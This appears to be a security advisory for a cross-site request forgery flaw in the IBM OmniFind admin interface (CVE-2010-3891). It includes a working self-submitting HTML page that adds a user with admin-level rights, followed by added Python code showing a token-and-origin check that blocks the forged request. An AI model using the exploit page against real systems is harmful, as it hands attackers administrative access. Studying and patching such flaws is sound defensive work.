IBM OmniFind - Cross-Site Request Forgery

Author: Fatih Kilic
type: webapps
platform: multiple
port: 
date_added: 2010-11-09  
date_updated: 2010-11-09  
verified: 0  
codes: CVE-2010-3891;OSVDB-69083  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 15473.html  
The forms in the administrator interface (ESAdmin) are not protected against
cross-site request forgery (CSRF): they carry no anti-CSRF token and the server
does not check the request origin. A request forged from a third-party page is
therefore accepted as long as the browser attaches the victim's session cookie.
The attacker can perform any action the victim is authorized for, in the
victim's context, if the victim is logged in to the administrator interface while
visiting the attacker's page.

An example attack scenario:
The attacker hosts a web page containing a hidden, pre-filled copy of the
"add user" form that points at the OmniFind host and is submitted automatically
on page load. An administrator who opens the page while logged in creates the
attacker's user without noticing.


Exploit to add an admin user (replace omnifind-host with the target):
<html>
  <head><title>Some seemingly benign web-site</title></head>
  <!-- submit the hidden form as soon as the page has loaded -->
  <body onLoad="document.forms[0].submit();">

    <!-- same target and parameter names as the real "add user" form;
         the browser attaches the victim's session cookie automatically -->
    <form method="post" action="http://omnifind-host/ESAdmin/security.do">
      <input type="hidden" name="command" value="saveNewUser"/>
      <input type="hidden" name="user.name" value="joemueller"/>
      <input type="hidden" name="user.role" value="0"/>
      <input type="hidden" name="user.allCollections" value="true"/>
      <input type="hidden" name="apply" value="OK"/>
    </form>
  </body>
</html>
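The advisory says the forms are accepted with only a session cookie. The following added example (not IBM's code and not part of the original advisory) shows the check that was missing: a server-side synchronizer token bound to the session, compared in constant time, plus an Origin/Referer check. The request model, the session store, the `csrf_token` field name, the `JSESSIONID` cookie name and the `http://omnifind-host` origin are assumptions made for the example; the forged request reuses the exact parameters from the exploit above.

```python
"""Synchronizer-token CSRF check (added example; names are hypothetical)."""
from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlparse

APP_ORIGIN = "http://omnifind-host"          # assumed origin of the admin UI
SESSION_COOKIE = "JSESSIONID"                # assumed session cookie name
TOKEN_FIELD = "csrf_token"                   # hypothetical hidden form field

# Server-side session store: session id -> anti-CSRF token (constructed here)
SESSION_TOKENS: Dict[str, str] = {}


@dataclass
class Request:
    """Minimal model of an incoming HTTP request."""
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)
    cookies: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


def issue_token(session_id: str) -> str:
    """Create a fresh random token for the session and remember it server-side."""
    token = secrets.token_urlsafe(32)
    SESSION_TOKENS[session_id] = token
    return token


def hidden_token_field(token: str) -> str:
    """Hidden input the real form must embed so legitimate posts carry the token."""
    return f'<input type="hidden" name="{TOKEN_FIELD}" value="{token}"/>'


def request_origin(req: Request) -> Optional[str]:
    """Origin header, else the origin part of Referer, else None."""
    origin = req.headers.get("Origin")
    if origin:
        return origin
    referer = req.headers.get("Referer")
    if referer:
        p = urlparse(referer)
        return f"{p.scheme}://{p.netloc}"
    return None


def csrf_check(req: Request) -> Tuple[bool, str]:
    """Return (accepted, reason). Every state-changing POST must pass this."""
    if req.method.upper() != "POST":
        return False, "state changes must use POST"
    session_id = req.cookies.get(SESSION_COOKIE)
    expected = SESSION_TOKENS.get(session_id) if session_id else None
    if expected is None:
        return False, "no authenticated session"
    # Constant-time compare so a wrong token leaks nothing about the right one.
    supplied = req.form.get(TOKEN_FIELD, "")
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return False, "token missing or wrong"
    # Defence in depth: fail closed when the origin is absent or foreign.
    if request_origin(req) != APP_ORIGIN:
        return False, "cross-site origin"
    return True, "ok"


def exploit_form_fields() -> Dict[str, str]:
    """The parameters the exploit page above posts (from the advisory)."""
    return {"command": "saveNewUser", "user.name": "joemueller",
            "user.role": "0", "user.allCollections": "true", "apply": "OK"}


def forged_request(session_id: str) -> Request:
    """What the attacker's auto-submitting form produces in the victim's browser:
    the session cookie rides along, but no token and a foreign Origin."""
    return Request("POST", "/ESAdmin/security.do",
                   headers={"Origin": "http://attacker.example"},   # constructed
                   cookies={SESSION_COOKIE: session_id},
                   form=exploit_form_fields())


def legitimate_request(session_id: str, token: str) -> Request:
    """The same action submitted from the genuine admin page."""
    form = dict(exploit_form_fields(), **{TOKEN_FIELD: token})
    return Request("POST", "/ESAdmin/security.do",
                   headers={"Origin": APP_ORIGIN},
                   cookies={SESSION_COOKIE: session_id}, form=form)


if __name__ == "__main__":
    sid = "constructed-session-id"
    tok = issue_token(sid)
    print(hidden_token_field(tok))
    print("legitimate:", csrf_check(legitimate_request(sid, tok)))
    print("forged:    ", csrf_check(forged_request(sid)))
```

The forged request is rejected for a missing token even though it carries a valid session cookie, which is exactly the condition the advisory describes as unchecked. The origin check alone would also have stopped this particular page, but browsers do not always send Origin or Referer, so it is kept as a second line rather than the only one.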